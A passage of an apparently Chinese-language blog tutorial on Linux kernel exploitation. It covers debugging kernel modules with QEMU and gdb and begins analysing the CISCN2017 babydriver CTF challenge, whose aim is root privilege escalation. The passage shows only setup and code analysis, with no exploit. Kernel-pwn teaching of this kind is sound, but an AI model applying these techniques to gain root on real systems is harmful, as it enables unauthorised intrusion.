class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 一定要提前指定架构</span></span><br><span class="line"><span class="built_in">set</span> architecture i386:x86-64</span><br><span class="line">gef-remote --qemu-mode localhost:1234</span><br></pre></td></tr></table></figure><p>坑点3：如果 qemu 断在 <code>start_kernel</code>时 gef 报错：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[!] Command <span class="string">&#x27;context&#x27;</span> failed to execute properly, reason: max() arg is an empty sequence</span><br></pre></td></tr></table></figure><p>直接单步 <code>ni</code> 一下即可。</p></blockquote><h4 id="b-attach-drivers">b. attach drivers</h4><h5 id="1-常规步骤">1) 常规步骤</h5><p>首先， 将目标驱动加载进内核中：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">insmod &lt;driver_module_name&gt;</span><br></pre></td></tr></table></figure><p>之后，通过以下命令查看 qemu 中内核驱动的 text 段的装载基地址：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 查看装载驱动</span></span><br><span class="line">lsmod</span><br><span class="line"><span class="comment"># 获取驱动加载的基地址</span></span><br><span class="line">grep &lt;target_module_name&gt; /proc/modules </span><br></pre></td></tr></table></figure><p>在 gdb 窗口中，键入 以下命令以加载调试符号：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">add-symbol-file mydrivers/ko_test.ko &lt;ko_test_base_addr&gt; [-s &lt;section1_name&gt; &lt;section1_addr&gt;] ...</span><br></pre></td></tr></table></figure><blockquote><p>注，与 vmlinux 不同，使用 add-symbol-file 加载内核模块符号时，<strong>必须指定内核模块的 text 段基地址</strong>。</p><p>因为内核位于众所周知的虚拟地址（该地址与 vmlinux elf 文件的加载地址相同），但内核模块只是一个存档，不存在有效加载地址，只能等到内核加载器分配内存并决定在哪里加载此模块的每个可加载部分。因此在加载内核模块前，我们无法得知内核模块将会加载到哪块内存上。故将符号文件加载进 gdb 时，我们必须尽可能显式指定每个 section 的地址。</p><p>需要注意的是，<strong>加载符号文件时，越多指定每个 section 的地址越好</strong>。否则如果只单独指定了 .text 段的基地址，则有可能在给函数下断点时断不下来，非常影响调试。</p></blockquote><p>如何查看目标内核模块的各个 section 加载首地址呢？请执行以下命令：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grep <span class="string">&quot;0x&quot;</span> /sys/module/ko_test/sections/.*</span><br></pre></td></tr></table></figure><h5 id="2-例子">2) 例子</h5><p>一个小小例子：调试 ko_test.ko 的步骤如下：</p><ul><li><p>首先在 qemu 中的 kernel shell 执行以下命令</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 首先装载 ko_test 进内核中</span></span><br><span class="line">insmod /ko_test.ko</span><br><span class="line"><span class="comment"># 查看当前 ko_test 装载的地址</span></span><br><span class="line">grep ko_test /proc/modules</span><br><span class="line">grep <span class="string">&quot;0x&quot;</span> /sys/module/ko_test/sections/.*</span><br></pre></td></tr></table></figure><p>输出如下：</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211003135526278.png" alt="image-20211003135526278"></p></li><li><p>记录下这些地址，之后进入 gdb 中，先按下 Ctrl+C 断下 kernel，然后键入以下命令：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 将对应符号加载至该地址处</span></span><br><span class="line">add-symbol-file mydrivers/ko_test.ko  0xffffffffc0002000 \</span><br><span class="line">                    -s .rodata.str1.1 0xffffffffc000304c \</span><br><span class="line">                    -s .symtab        0xffffffffc0007000 \</span><br><span class="line">                    -s .text.unlikely 0xffffffffc0002000</span><br><span class="line"><span class="comment"># 下断点</span></span><br><span class="line">b ko_test_init</span><br><span class="line">b ko_test_exit</span><br><span class="line"><span class="comment"># 使其继续执行</span></span><br><span class="line"><span class="built_in">continue</span></span><br></pre></td></tr></table></figure><p><img src="/2021/10/kernel_pwn_introduction/image-20211003140102062.png" alt="image-20211003140102062"></p></li><li><p>最后回到 qemu 中，在 kernel shell 中执行以下命令：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 卸载 ko_test</span></span><br><span class="line">rmmod ko_tes</span><br></pre></td></tr></table></figure><p>此时 gdb 会断到 ko_test_exit 中：</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211003140345483.png" alt="image-20211003140345483"></p><p>如果在卸载了ko_test后，又重新加载 ko_test，</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">insmod ko_test</span><br></pre></td></tr></table></figure><p>则 gdb 会立即断到 ko_test_init 中：</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211003140435218.png" alt="image-20211003140435218"></p><blockquote><p>这可能是因为指定了 nokaslr，使得相同驱动多次加载的基地址是一致的。</p></blockquote></li></ul><p>上面调试 kernel module 的 init 函数方法算是一个小 trick，它利用了 <strong>noaslr 环境下相同驱动重新加载的基地址一致</strong> 的原理来下断。但最为正确的调试 init 函数的方式，还是得跟踪 <code>do_init_module</code> 函数的控制流来获取基地址。以下是一系列相关操作步骤：</p><blockquote><p>跟踪 <code>do_init_module</code> 函数是因为它在 <code>load_module</code> 函数中被调用。<code>load_module</code>函数将在完成大量的内存加载工作后，最后进入 <code>do_init_module</code> 函数中执行内核模块的 init 函数，并在其中进行善后工作。</p><p><code>load_module</code>函数将被作为 SYSCALL 函数的 <code>init_module</code>调用。</p></blockquote><ul><li><p>首先让 kernel 跑飞，等到 kernel 加载完成，shell 界面显示后，gdb 按下 ctrl + C 断下，给 <code>do_init_module</code>函数下断。该函数的前半部分将会执行 内核模块的 init 函数：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * This is where the real work happens.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Keep it uninlined to provide a reliable breakpoint target, e.g. for the gdb</span></span><br><span class="line"><span class="comment"> * helper command &#x27;lx-symbols&#x27;.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> noinline <span class="type">int</span> <span class="title">do_init_module</span><span class="params">(<span class="keyword">struct</span> <span class="keyword">module</span> *mod)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  [...]</span><br><span class="line">  <span class="comment">/* Start the module */</span></span><br><span class="line">  <span class="keyword">if</span> (mod-&gt;init != <span class="literal">NULL</span>)</span><br><span class="line">    ret = <span class="built_in">do_one_initcall</span>(mod-&gt;init);   <span class="comment">// &lt;- 此处执行 ko_test_init 函数</span></span><br><span class="line">  <span class="keyword">if</span> (ret &lt; <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="keyword">goto</span> fail_free_freeinit;</span><br><span class="line">  &#125;</span><br><span class="line">  [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>gdb 键入 <code>continue</code> 再让 kernel 跑飞。之后kernel shell 中输入 <code>insmod /ko_test.ko</code>装载内核模块，此时gdb会断下。在 gdb 中查看 <code>mod-&gt;init</code> 成员即可查看到 kernel module init 函数的首地址。</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211003143313234.png" alt="image-20211003143313234"></p></li><li><p>要想看到当前 kernel module 的全部 section 地址，可以在 gdb 中键入以下命令</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 查看当前 module 的 sections 个数</span></span><br><span class="line">p mod-&gt;sect_attrs-&gt;nsections</span><br><span class="line"><span class="comment"># 查看第 3 个 section 信息</span></span><br><span class="line">p mod-&gt;sect_attrs-&gt;attrs[2]</span><br></pre></td></tr></table></figure><p><img src="/2021/10/kernel_pwn_introduction/image-20211003144520767.png" alt="image-20211003144520767"></p><p>有了当前内核模块的全部 section 名称与基地址后，就可以按照之前的方法来加载符号文件了。</p></li></ul><h4 id="c-启动脚本">c. 启动脚本</h4><blockquote><p>配环境真是一件麻烦到极点的事情，不过目前就到此为止了 :)</p></blockquote><p>笔者将一系列启动命令整合成了一个 shell 脚本，方便一键运行：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#! /bin/bash</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 判断当前权限是否为 root，需要高权限以执行 gef-remote --qemu-mode</span></span><br><span class="line">user=$(<span class="built_in">env</span> | grep <span class="string">&quot;^USER&quot;</span> | <span class="built_in">cut</span> -d <span class="string">&quot;=&quot;</span> -f 2)</span><br><span class="line"><span class="keyword">if</span> [ <span class="string">&quot;<span class="variable">$user</span>&quot;</span> != <span class="string">&quot;root&quot;</span>  ]</span><br><span class="line">  <span class="keyword">then</span></span><br><span class="line">    <span class="built_in">echo</span> <span class="string">&quot;请使用 root 权限执行&quot;</span></span><br><span class="line">    <span class="built_in">exit</span></span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 复制驱动至 rootfs</span></span><br><span class="line"><span class="built_in">cp</span> ./mydrivers/*.ko busybox-1.34.1/_install</span><br><span class="line"></span><br><span class="line"><span class="comment"># 构建 rootfs</span></span><br><span class="line"><span class="built_in">pushd</span> busybox-1.34.1/_install</span><br><span class="line">find . | cpio -o --format=newc &gt; ../../rootfs.img</span><br><span class="line"><span class="built_in">popd</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 启动 qemu</span></span><br><span class="line">qemu-system-x86_64 \</span><br><span class="line">    -kernel ./arch/x86/boot/bzImage \</span><br><span class="line">    -initrd ./rootfs.img \</span><br><span class="line">    -append <span class="string">&quot;nokaslr&quot;</span> \</span><br><span class="line">    -s  \</span><br><span class="line">    -S&amp;</span><br><span class="line"></span><br><span class="line">    <span class="comment"># -s ： 等价于 -gdb tcp::1234， 指定 qemu 的调试链接</span></span><br><span class="line">    <span class="comment"># -S ：指定 qemu 启动后立即挂起</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># -nographic                # 关闭 QEMU 图形界面</span></span><br><span class="line">    <span class="comment"># -append &quot;console=ttyS0&quot;   # 和 -nographic 一起使用，启动的界面就变成了当前终端</span></span><br><span class="line"></span><br><span class="line">gnome-terminal -e <span class="string">&#x27;gdb -x mygdbinit&#x27;</span></span><br></pre></td></tr></table></figure><p>gdbinit 内容如下：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">set</span> architecture i386:x86-64</span><br><span class="line">add-symbol-file vmlinux</span><br><span class="line">gef-remote --qemu-mode localhost:1234</span><br><span class="line"></span><br><span class="line">b start_kernel</span><br><span class="line">c</span><br></pre></td></tr></table></figure><h2 id="四、小试牛刀">四、小试牛刀</h2><blockquote><p>这里选用 CISCN2017_babydriver 作为笔者入门的第一题。之所以选用这一题是因为网上资料较多，方便学习。</p></blockquote><h3 id="1-题目附件">1. 题目附件</h3><p>题目附件可在<a href="https://github.com/ctf-wiki/ctf-challenges/blob/master/pwn/kernel/CISCN2017-babydriver/babydriver.tar">此处</a>下载。</p><p>题目给了三个文件，分别是：</p><ul><li><a href="http://boot.sh">boot.sh</a> 启动脚本</li><li>bzImage 内核启动文件</li><li>rootfs.cpio 根文件系统镜像</li></ul><h3 id="2-尝试执行">2. 尝试执行</h3><p>初始时，直接解压 <code>babydriver.tar</code> 并运行启动脚本：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 解压</span></span><br><span class="line"><span class="built_in">mkdir</span> babydriver</span><br><span class="line">tar -xf babydriver.tar -C babydriver</span><br><span class="line"><span class="comment"># 启动</span></span><br><span class="line"><span class="built_in">cd</span> babydriver </span><br><span class="line">./boot.sh</span><br></pre></td></tr></table></figure><p>但 KVM 报错，其报错信息如下所示：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Could not access KVM kernel module: No such file or directory</span><br><span class="line">qemu-system-x86_64: failed to initialize kvm: No such file or directory</span><br></pre></td></tr></table></figure><p>使用以下命令查看当前 linux in vmware 支不支持虚拟化，发现输出为空，即<strong>不支持</strong>。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">egrep <span class="string">&#x27;^flags.*(vmx|svm)&#x27;</span> /proc/cpuinfo</span><br></pre></td></tr></table></figure><p>检查了一下物理机的 Virtualization Settings, 已经全部是打开了的。再检查以下 VMware 的CPU配置，发现没有勾选 <code>虚拟化 Intel VT-x/EPT 或 AMD-V/RVI</code>。</p><p>勾选后重新启动 linux 虚拟机，提示<code>此平台不支持虚拟化的 Intel VT-x/EPT</code>…</p><p>经过一番百度，发现是 Hyper-V 没有禁用彻底。彻底禁用的操作如下：</p><ul><li><p>控制面板—程序——打开或关闭Windows功能，取消勾选Hyper-V，确定禁用Hyper-V服务</p></li><li><p><strong>管理员权限</strong>打开 cmd，执行 <code>bcdedit /set hypervisorlaunchtype off</code></p><blockquote><p>若想重新启用，则执行 <code>bcdedit /set hypervisorlaunchtype auto</code></p></blockquote></li><li><p>重启计算机</p></li></ul><p>之后再启动 linux in Vmware，其内部的 kvm 便可以正常执行了。</p><h3 id="3-题目分析">3. 题目分析</h3><h4 id="a-目的">a. 目的</h4><ul><li><p>查看一下根目录的 <code>/init</code> 文件，不难看出这题需要我们进行<strong>内核提权</strong>，只有提权后才可以查看  flag。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line"> </span><br><span class="line">mount -t proc none /proc</span><br><span class="line">mount -t sysfs none /sys</span><br><span class="line">mount -t devtmpfs devtmpfs /dev</span><br><span class="line"><span class="built_in">chown</span> root:root flag                      <span class="comment"># flag 被设置为只有 root 可读</span></span><br><span class="line"><span class="built_in">chmod</span> 400 flag</span><br><span class="line"><span class="built_in">exec</span> 0&lt;/dev/console</span><br><span class="line"><span class="built_in">exec</span> 1&gt;/dev/console</span><br><span class="line"><span class="built_in">exec</span> 2&gt;/dev/console</span><br><span class="line"></span><br><span class="line">insmod /lib/modules/4.4.72/babydriver.ko   <span class="comment"># 加载漏洞驱动</span></span><br><span class="line"><span class="built_in">chmod</span> 777 /dev/babydev</span><br><span class="line"><span class="built_in">echo</span> -e <span class="string">&quot;\nBoot took <span class="subst">$(cut -d&#x27; &#x27; -f1 /proc/uptime)</span> seconds\n&quot;</span></span><br><span class="line">setsid cttyhack setuidgid 1000 sh</span><br><span class="line"></span><br><span class="line">umount /proc</span><br><span class="line">umount /sys</span><br><span class="line">poweroff -d 0  -f</span><br></pre></td></tr></table></figure></li></ul><h4 id="b-获取目标内核模块">b. 获取目标内核模块</h4><blockquote><p>在提权之前，我们需要先把加载进内核的驱动 dump 出来，这个驱动大概率是一个存在漏洞的驱动。</p></blockquote><p>首先使用 file 命令查看一下 rootfs.cpio 的文件格式：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ file rootfs.cpio                 </span><br><span class="line">rootfs.cpio: gzip compressed data, last modified: Tue Jul  4 08:39:15   2017, max compression, from Unix, original size modulo 2^32 2844672</span><br></pre></td></tr></table></figure><p>可以看到是一个 gzip 格式的文件，因此我们需要给该文件改一下名称，否则 gunzip 将无法识别文件后缀。之后就是解压 gzip + 解包 cpio 的操作：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mv</span> rootfs.cpio rootfs.cpio.gz</span><br><span class="line">gunzip rootfs.cpio.gz</span><br></pre></td></tr></table></figure><p>解压之后的文件便是正常的 CPIO 格式：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ file rootfs.cpio </span><br><span class="line">rootfs.cpio: ASCII cpio archive (SVR4 with no CRC)</span><br></pre></td></tr></table></figure><p>使用常规方式给 CPIO 解包即可：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cpio -idmv &lt; rootfs.cpio</span><br></pre></td></tr></table></figure><p>解包完成后，即可在<code>/lib/modules/4.4.72/babydriver.ko</code>下找到目标驱动。</p><h4 id="c-查看保护">c. 查看保护</h4><p>首先是驱动程序保护：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ checksec babydriver.ko</span><br><span class="line">[*] <span class="string">&#x27;/usr/class/kernel_pwn/CISCN2017-babydriver/babydriver/babydriver.ko&#x27;</span></span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    No RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x0)</span><br></pre></td></tr></table></figure><p>可以看到这里只开启了 NX 保护。</p><p>接着再看看 qemu 启动参数，发现启动了 smep 保护。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"></span><br><span class="line">qemu-system-x86_64 \</span><br><span class="line">    -initrd rootfs.cpio \</span><br><span class="line">    -kernel bzImage \</span><br><span class="line">    -append <span class="string">&#x27;console=ttyS0 root=/dev/ram oops=panic panic=1&#x27;</span> \</span><br><span class="line">    -enable-kvm \</span><br><span class="line">    -monitor /dev/null \</span><br><span class="line">    -m 64M \</span><br><span class="line">    --nographic  \</span><br><span class="line">    -smp cores=1,threads=1 \</span><br><span class="line">    -cpu kvm64,+smep      <span class="comment"># &lt;- 启用 +smep 保护</span></span><br></pre></td></tr></table></figure><blockquote><p>SMEP（Supervisor Mode Execution Protection 管理模式执行保护）：<strong>禁止CPU处于 ring0 模式时执行用户空间代码</strong>。</p><p>还有一个比较相近的保护措施是 SMAP（Superivisor Mode Access Protection 管理模式访问保护）：禁止内核CPU访问用户空间的数据。</p></blockquote><p>注意到 <strong>没有启动 kaslr</strong>。</p><h4 id="d-代码分析">d. 代码分析</h4><blockquote><p>第一次接触内核题，代码什么的当然需要理清楚了。这里我们一一把驱动函数代码分析过去。</p></blockquote><h5 id="1-babydriver-init">1) babydriver_init</h5><h6 id="1-1-关键代码">1.1) 关键代码</h6><p>先上代码，这里重点关注红框框住的部分（其余部分是异常处理）</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211004162419135.png" alt="image-20211004162419135"></p><p>简单精简一下，实际关键代码如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">alloc_chrdev_region</span>(&amp;babydev_no, <span class="number">0</span>, <span class="number">1</span>, <span class="string">&quot;babydev&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="built_in">cdev_init</span>(&amp;cdev_0, &amp;fops);</span><br><span class="line">cdev_<span class="number">0.</span>owner = &amp;_this_module;</span><br><span class="line"></span><br><span class="line"><span class="built_in">cdev_add</span>(&amp;cdev_0, babydev_no, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">babydev_class = _class_create(&amp;_this_module, <span class="string">&quot;babydev&quot;</span>, &amp;babydev_no);</span><br><span class="line"></span><br><span class="line"><span class="built_in">device_create</span>(babydev_class, <span class="number">0</span>, babydev_no, <span class="number">0</span>, <span class="string">&quot;babydev&quot;</span>);</span><br></pre></td></tr></table></figure><p>在解释上面的代码之前，我们先来简单学习一下<strong>设备文件</strong>的相关知识。</p><h6 id="1-2-设备号">1.2) 设备号</h6><p>对于<strong>所有</strong>设备文件来说，一共分为三种，分别是：</p><ul><li>字符设备（ char device），例如控制台</li><li>块设备（block device），例如文件系统</li><li>网络设备（network device），例如网卡</li></ul><p>设备文件可以通过设备文件名来访问，通常位于 /dev 目录下。<code>ls -a</code> 出来的第一个字符即说明了当前设备文件的类型：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># c 表示字符设备</span></span><br><span class="line">crw-rw-rw-   1 root <span class="built_in">tty</span>       5,   0 Oct  3 15:03 0</span><br><span class="line"><span class="comment"># l 表示符号链接</span></span><br><span class="line">lrwxrwxrwx   1 root root          15 Oct  2 23:43 stdout -&gt; /proc/self/fd/1</span><br><span class="line"><span class="comment"># - 表示常规文件</span></span><br><span class="line">-rw-rw-r--  1 Kiprey Kiprey  203792 Jun 16  2017 babydriver.ko</span><br></pre></td></tr></table></figure><p>我们可以在<strong>设备文件条目</strong>中最后一次修改日期之前看到两个数字(用逗号分隔)，例如上面的 <code>5, 0</code>（这个位置通常显示的是普通文件的<strong>文件长度</strong>），对于<strong>设备文件条目</strong>的信息中，形如<code>5,0</code>这样的一对数字，分别是特定设备的<strong>主设备号</strong>和<strong>副设备号</strong>。</p><p>在传统意义上，<strong>主设备号</strong>标识与设备相关的<strong>驱动程序</strong>。例如，<code>/dev/null</code> 和 <code>/dev/zero</code> 都是由驱动1管理的。而多个串行终端（即 ttyX, ttySX）是由驱动4管理的。现代的Linux内核已经<strong>支持多个驱动程序共享主设备号</strong>，但是我们仍然可以看到，目前大多数设备仍然是按照<strong>一个主设备号对应一个驱动程序</strong>的方式来组织的。</p><p>内核<strong>使用副设备号来确定引用的是哪个设备</strong>，但副设备号的作用仅限于此，内核不会知道更多关于某个特定副设备号的信息。</p><p>主设备号和副设备号可同时保存与类型 <code>dev_t</code> 中，而该类型实际上是一个 <code>u32</code>；其中的12位用于保存主设备号，20位用于保存副设备号。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> u32 <span class="type">__kernel_dev_t</span>;</span><br><span class="line"><span class="keyword">typedef</span> <span class="type">__kernel_dev_t</span>    <span class="type">dev_t</span>;</span><br></pre></td></tr></table></figure><p>在编写驱动程序需要使用主副设备号时，最好不要直接进行位运算操作，而是使用 <code>&lt;linux/kdev_t.h&gt;</code> 头文件中的宏定义操作：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> MAJOR(dev)    ((dev)&gt;&gt;8)              <span class="comment">// 获取主设备号</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MINOR(dev)    ((dev) &amp; 0xff)          <span class="comment">// 获取副设备号</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MKDEV(ma,mi)  ((ma)&lt;&lt;8 | (mi))        <span class="comment">// 从主副设备号中生成一个 dev_t 类型的变量</span></span></span><br></pre></td></tr></table></figure><p>设备文件相关的内容暂时到此为止，现在回归题目。</p><p>首先，babydriver_init 函数将会调用 <code>alloc_chrdev_region</code> 函数。该函数的函数声明如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * alloc_chrdev_region() - register a range of char device numbers</span></span><br><span class="line"><span class="comment"> * @dev: output parameter for first assigned number</span></span><br><span class="line"><span class="comment"> * @baseminor: first of the requested range of minor numbers</span></span><br><span class="line"><span class="comment"> * @count: the number of minor numbers required</span></span><br><span class="line"><span class="comment"> * @name: the name of the associated device or driver</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Allocates a range of char device numbers.  The major number will be</span></span><br><span class="line"><span class="comment"> * chosen dynamically, and returned (along with the first minor number)</span></span><br><span class="line"><span class="comment"> * in @dev.  Returns zero or a negative error code.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">alloc_chrdev_region</span><span class="params">(<span class="type">dev_t</span> *dev, <span class="type">unsigned</span> baseminor, <span class="type">unsigned</span> count,</span></span></span><br><span class="line"><span class="params"><span class="function">      <span class="type">const</span> <span class="type">char</span> *name)</span></span></span><br></pre></td></tr></table></figure><p>根据当前函数的调用代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">alloc_chrdev_region</span>(&amp;babydev_no, <span class="number">0</span>, <span class="number">1</span>, <span class="string">&quot;babydev&quot;</span>);</span><br></pre></td></tr></table></figure><p>我们不难看出，babydriver_init 函数尝试向内核申请一个<strong>字符设备</strong>的新的<strong>主设备号</strong>，其中副设备号从0开始，设备名称为 <code>babydev</code>，并将申请到的主副设备号存入 babydev_no 全局变量中。</p><blockquote><p>还有一个名为<code>register_chrdev_region</code>的函数，它在调用时需要指定<strong>主副设备号的起始值</strong>，要求内核在起始值的基础上进行分配，与 <code>alloc_chrdev_region</code>功能相似但又有所不同。</p></blockquote><p>设备号分配完成后，我们需要将其连接到实现设备操作的内部函数。</p><h6 id="1-3-注册字符设备">1.3) 注册字符设备</h6><p>内核使用 <code>cdev</code> 类型的结构来表示字符设备，因此在操作设备之前，内核必须<strong>初始化</strong>+<strong>注册</strong>一个这样的结构体。</p><blockquote><p>注意，一个驱动程序可以分配不止一个设备号，创建不止一个设备。</p></blockquote><p>该函数的执行代码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cdev_init</span>(&amp;cdev_0, &amp;fops);</span><br></pre></td></tr></table></figure><p>cdev 结构体的初始化函数如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * cdev_init() - initialize a cdev structure</span></span><br><span class="line"><span class="comment"> * 